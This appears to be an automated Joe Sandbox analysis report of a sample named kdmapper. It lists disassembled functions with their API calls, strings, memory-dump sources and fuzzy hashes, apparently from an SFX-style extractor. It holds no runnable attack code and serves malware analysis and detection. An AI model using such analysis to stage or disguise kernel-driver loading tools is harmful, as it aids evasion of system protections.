Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0

Part of subcall function 00DEB92D: _wcsrchr.LIBVCRUNTIME ref: 00DEB944

_wcslen.LIBCMT ref: 00DEC197
_wcslen.LIBCMT ref: 00DEC1DF

Strings

.rar, xrefs: 00DEC0E1, 00DEC134
.sfx, xrefs: 00DEC11A
.exe, xrefs: 00DEC10B

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 4116140745d3967920d8359da0c2bacc443e3d16205237d3cb2b36cd4301a7ce
Instruction ID: 6969a285bfbd6e95321885b5a49da3eac966515b6be1369c0f2014822573a4c5
Opcode Fuzzy Hash: 4116140745d3967920d8359da0c2bacc443e3d16205237d3cb2b36cd4301a7ce
Instruction Fuzzy Hash: 9D415B225203D595C731BF359802A7BB7A8EF41754F18690EFAC16B182E7509D83C375

Function 00DEBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DEBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00DEA275,?,?,00000800,?,00DEA23A,?,00DE755C), ref: 00DEBBC5
_wcslen.LIBCMT ref: 00DEBC3B

Strings

UNC, xrefs: 00DEBBA7
\\?\, xrefs: 00DEBB52, 00DEBB99, 00DEBBF7, 00DEBC4E

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: bf052e9ef2846cc05cabe4c50e755c016111c16aa64970ea643a685859f82442
Instruction ID: 689800209c7133554d8664a83537fda8578e2cf354630ccf80866616b982e78f
Opcode Fuzzy Hash: bf052e9ef2846cc05cabe4c50e755c016111c16aa64970ea643a685859f82442
Instruction Fuzzy Hash: C741C531404299A6CF21BF72CC01EEB77A9EF41364F248567F554B3151DBB0FA908AB0

Function 00DFCD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00DFCD84

Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033

Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1

Strings

<, xrefs: 00DFCD68
HIDE, xrefs: 00DFCDC6
MIN, xrefs: 00DFCDF5
MAX, xrefs: 00DFCDD9

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 68963d3927e819054715fd07dfc6f8741b3c79ace557361469ae7cc94e657a0c
Instruction ID: 6fcd3ce8c3bc9c61f747266d53ed69ea6e001441972a039d98b2e17a3ad8021e
Opcode Fuzzy Hash: 68963d3927e819054715fd07dfc6f8741b3c79ace557361469ae7cc94e657a0c
Instruction Fuzzy Hash: 4A316B7290020DAADB25DB64CC41AFEB3BDEF14350F45C166FA05E7180EBB09A848FB1

Function 00DEB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DEB9B8

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

_wcschr.LIBVCRUNTIME ref: 00DEB9D6
_wcschr.LIBVCRUNTIME ref: 00DEB9E6

Strings

%c:\, xrefs: 00DEB9AE

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 6539dd54c71e341ac519ef4a869c85eb1b6e25e2674fd8f8b00c18849970f74e
Instruction ID: 26bdad5f6e687fa88df9cb87996f7f3c613ea70e07d80d32f716bf5ca4a53e06
Opcode Fuzzy Hash: 6539dd54c71e341ac519ef4a869c85eb1b6e25e2674fd8f8b00c18849970f74e
Instruction Fuzzy Hash: BB01456310035169DA317B768C46D7BA7ECEE81370B54541FF584E2082EB20E88082B1

Function 00DFB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

EndDialog.USER32(?,00000001), ref: 00DFB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00DFB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00DFB304

Strings

xz, xrefs: 00DFB2E2
GETPASSWORD1, xrefs: 00DFB289

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz
API String ID: 445417207-3234807970
Opcode ID: be566e1231ba52f4e03b05294cf8204f2d1cf586a991a39893e105bb9b94875b
Instruction ID: ecd3385cfc78f0773eb5168d62d89c0231cb6f27448aded9553955cc06ae27fd
Opcode Fuzzy Hash: be566e1231ba52f4e03b05294cf8204f2d1cf586a991a39893e105bb9b94875b
Instruction Fuzzy Hash: 7C11E532A40118BADB219AB5DC49FFE376CEB5A760F158022FB85B2080C7A0D9459771

Function 00DFB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00DFB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00DFB712
DeleteObject.GDI32(00000000), ref: 00DFB744
DeleteObject.GDI32(00000000), ref: 00DFB767

Part of subcall function 00DFA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6D5
Part of subcall function 00DFA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6EC
Part of subcall function 00DFA6C2: LoadResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA703
Part of subcall function 00DFA6C2: LockResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA712
Part of subcall function 00DFA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DFB73D,00000066), ref: 00DFA72D
Part of subcall function 00DFA6C2: GlobalLock.KERNEL32(00000000), ref: 00DFA73E
Part of subcall function 00DFA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
Part of subcall function 00DFA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DFA7A7
Part of subcall function 00DFA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00DFA7C6
Part of subcall function 00DFA6C2: GlobalFree.KERNEL32(00000000), ref: 00DFA7CD

Strings

], xrefs: 00DFB71A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: e39d1b469f2b9818c6e155d93dcb698507d555afd8f0fe7c3db44b98d7780f04
Instruction ID: ab34aa98d6efad3b99480e65fd6e3f78562b7c91a22fb97177597a38228de6da
Opcode Fuzzy Hash: e39d1b469f2b9818c6e155d93dcb698507d555afd8f0fe7c3db44b98d7780f04
Instruction Fuzzy Hash: AB012676500619ABC71277789C09A7F7AB9DFC1762F1F8112FB04B7291DF618D0A4271

Function 00DFD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

EndDialog.USER32(?,00000001), ref: 00DFD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DFD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFD675
SetDlgItemTextW.USER32(?,00000068), ref: 00DFD684

Strings

RENAMEDLG, xrefs: 00DFD618

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 95c8a03545259b8630ddd2b6c0fd618ea985deaf1794caf7e5b84deca8727049
Instruction ID: 5ab2b2ae6b242c13a9f47620680e7b7da916b555bc9b777d7c6d0c64824cc0f3
Opcode Fuzzy Hash: 95c8a03545259b8630ddd2b6c0fd618ea985deaf1794caf7e5b84deca8727049
Instruction Fuzzy Hash: A301F53368521CBED2105F769D09FB67B5FEB9BB01F228110F345F2090C6A29A098779

Function 00E07E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E07E24,00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002), ref: 00E07E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E07EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00E07E24,00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002), ref: 00E07EC9

Strings

mscoree.dll, xrefs: 00E07E8C
CorExitProcess, xrefs: 00E07E9E

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 48093359a79a1eb89f871bb2872b837b88ee463ec2ebaa40e6b62124f52016dd
Instruction ID: 7d7a4c6ed536d47deb5ed90a152bb8982337c4a76228c8745f6032398175daaa
Opcode Fuzzy Hash: 48093359a79a1eb89f871bb2872b837b88ee463ec2ebaa40e6b62124f52016dd
Instruction Fuzzy Hash: 14F06831A01208BFDB119FA1DC09BDEBFB5EF44715F0080A9F805B22A0DB749E85CB90

Function 00DEF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00DF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
Part of subcall function 00DF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DEF2E4
GetProcAddress.KERNEL32(00E281C8,CryptUnprotectMemory), ref: 00DEF2F4

Strings

CryptUnprotectMemory, xrefs: 00DEF2EA
Crypt32.dll, xrefs: 00DEF2CE
CryptProtectMemory, xrefs: 00DEF2DE

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 125ce11418b835d30f1e43a10e51fa35f0f7b237b4a35ee216fb181cf3a9983f
Instruction ID: 68407ba5cdb05ed51736a879c4da712e9cca8407de6e9327c71fe40339946027
Opcode Fuzzy Hash: 125ce11418b835d30f1e43a10e51fa35f0f7b237b4a35ee216fb181cf3a9983f
Instruction Fuzzy Hash: FFE04671950742AECB20AF3A9849B82BED5AF08700B18D82DE0DAB3641DAB5D5808B60

Function 00E02BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E02CA1
___AdjustPointer.LIBCMT ref: 00E02CC4
_abort.LIBCMT ref: 00E02D12
___AdjustPointer.LIBCMT ref: 00E02D60

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 20923ffffc06d93e0786ca7fedf703a67ca65a76814098741617dddb2604abd7
Instruction ID: 0bd0cc3a7e18de9e97b852abcfe64b5e044115614e0e358e085697aa77ad4b18
Opcode Fuzzy Hash: 20923ffffc06d93e0786ca7fedf703a67ca65a76814098741617dddb2604abd7
Instruction Fuzzy Hash: 5251E171600212AFEB298F54D889BAAB3E4FF54314F24552EEE05A76E1E731EDC0D790

Function 00E0BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E0BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E0BF5C

Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E0BF82
_free.LIBCMT ref: 00E0BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E0BFA4

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: b80392f7b4493aff5bff0b17314aed1eeb4f1f469723c256a564ce2544412a92
Instruction ID: 24fed2e56b96f3cbf19debead3f3f9358083393e6e704a14b399140152353a24
Opcode Fuzzy Hash: b80392f7b4493aff5bff0b17314aed1eeb4f1f469723c256a564ce2544412a92
Instruction Fuzzy Hash: 4801F7727022167FA7211AB75C4CCBB6A6EFFC2BA43145129F904F3281EF60CD4285B0

Function 00E09869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00E21030,00000200,00E091AD,00E0617E,?,?,?,?,00DED984,?,?,?,00000004,00DED710,?), ref: 00E0986E
_free.LIBCMT ref: 00E098A3
_free.LIBCMT ref: 00E098CA
SetLastError.KERNEL32(00000000,00E13A34,00000050,00E21030), ref: 00E098D7
SetLastError.KERNEL32(00000000,00E13A34,00000050,00E21030), ref: 00E098E0

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: df1752a40a2167bd563c8b83615bcc9741a66234babda26c7a4c5481c470c27f
Instruction ID: 6c194cffb25fd93e7e09def1a43e320e1209df419ba0c8193500be2f37aea6f3
Opcode Fuzzy Hash: df1752a40a2167bd563c8b83615bcc9741a66234babda26c7a4c5481c470c27f
Instruction Fuzzy Hash: 240144321017016FD21A2F35AC8599B26AEDBC27B4721A235F915B23D3EE308C864230

Function 00DF0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00DF11CF: ResetEvent.KERNEL32(?), ref: 00DF11E1
Part of subcall function 00DF11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00DF11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00DF0F21
CloseHandle.KERNEL32(?,?), ref: 00DF0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00DF0F54
CloseHandle.KERNEL32(?), ref: 00DF0F60
CloseHandle.KERNEL32(?), ref: 00DF0F6C

Part of subcall function 00DF0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00DF1206,?), ref: 00DF0FEA
Part of subcall function 00DF0FE4: GetLastError.KERNEL32(?), ref: 00DF0FF6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 176baec01e07be67accbdad412c4ac5d757d3b1d599fd912d855eed638f8b5fa
Instruction ID: d8d15551adff91a6e3ee9242766cb50842d145aef99ef54a8a8bd6333a9c8a8c
Opcode Fuzzy Hash: 176baec01e07be67accbdad412c4ac5d757d3b1d599fd912d855eed638f8b5fa
Instruction Fuzzy Hash: 12015E76500744EFC7229F65DC84BD6BBE9FF08710F008929F26AA2161CB757A58CA60

Function 00E0C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E0C817

Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4

_free.LIBCMT ref: 00E0C829
_free.LIBCMT ref: 00E0C83B
_free.LIBCMT ref: 00E0C84D
_free.LIBCMT ref: 00E0C85F

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9216019e3d7706681bf9d5cd040d43a584fdd08b0487b48dc9ed9f491925c8dd
Instruction ID: df085ee7ce6991286c2c4fd329a242fb1828b0531f2ce45449627ff54df21fa0
Opcode Fuzzy Hash: 9216019e3d7706681bf9d5cd040d43a584fdd08b0487b48dc9ed9f491925c8dd
Instruction Fuzzy Hash: 66F04F32510202AFC624DF69F585C4A77EDAB00718764B919F548F76D2CA70FCC08A68

Function 00DF1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DF1FE5
_wcslen.LIBCMT ref: 00DF1FF6
_wcslen.LIBCMT ref: 00DF2006
_wcslen.LIBCMT ref: 00DF2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00DEB371,?,?,00000000,?,?,?), ref: 00DF202F

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
